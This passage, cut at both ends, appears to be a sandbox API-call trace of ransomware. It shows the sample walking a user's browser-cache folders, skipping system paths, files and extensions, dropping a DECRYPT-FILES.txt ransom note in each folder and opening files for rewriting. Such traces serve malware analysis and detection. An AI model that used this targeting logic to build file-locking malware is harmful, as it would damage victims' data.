(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\All Users") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="AhnLab") returned 0x0 [0077.868] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.868] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0077.868] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.868] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\jkbimi8.tmp") returned 108 [0077.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.869] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0077.869] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.869] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\DECRYPT-FILES.txt") returned 114 [0077.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.870] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.870] CloseHandle (hObject=0x464) returned 1 [0077.871] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0077.871] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*" [0077.871] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.871] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.871] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.871] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.871] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.871] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.871] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.872] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.872] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.872] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.872] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.872] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.872] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.872] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.872] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0077.872] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.872] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" [0077.872] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\jkbimi8.tmp" [0077.872] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.873] CloseHandle (hObject=0x0) returned 0 [0077.873] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.873] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.873] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.873] CloseHandle (hObject=0x460) returned 1 [0077.873] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AY721QDR", cAlternateFileName="")) returned 1 [0077.873] lstrcmpW (lpString1="AY721QDR", lpString2=".") returned 1 [0077.873] lstrcmpW (lpString1="AY721QDR", lpString2="..") returned 1 [0077.873] lstrcatW (in: lpString1="AY721QDR", lpString2="\\" | out: lpString1="AY721QDR\\") returned="AY721QDR\\" [0077.873] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="AY721QDR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Program Files") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch=":\\Windows") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Games\\") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\All Users") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="AhnLab") returned 0x0 [0077.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0077.874] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.874] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\jkbimi8.tmp") returned 108 [0077.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0077.874] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.874] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\DECRYPT-FILES.txt") returned 114 [0077.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.874] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.875] CloseHandle (hObject=0x464) returned 1 [0077.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0077.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*" [0077.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.876] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.876] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.876] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.876] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.876] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.876] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.876] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.876] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.876] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.876] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.876] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.876] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.876] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0077.877] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.877] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" [0077.877] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\jkbimi8.tmp" [0077.877] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.877] CloseHandle (hObject=0x0) returned 0 [0077.877] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.877] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.877] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.877] CloseHandle (hObject=0x460) returned 1 [0077.878] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.878] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.878] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZBKZBIC", cAlternateFileName="")) returned 1 [0077.878] lstrcmpW (lpString1="DZBKZBIC", lpString2=".") returned 1 [0077.878] lstrcmpW (lpString1="DZBKZBIC", lpString2="..") returned 1 [0077.878] lstrcatW (in: 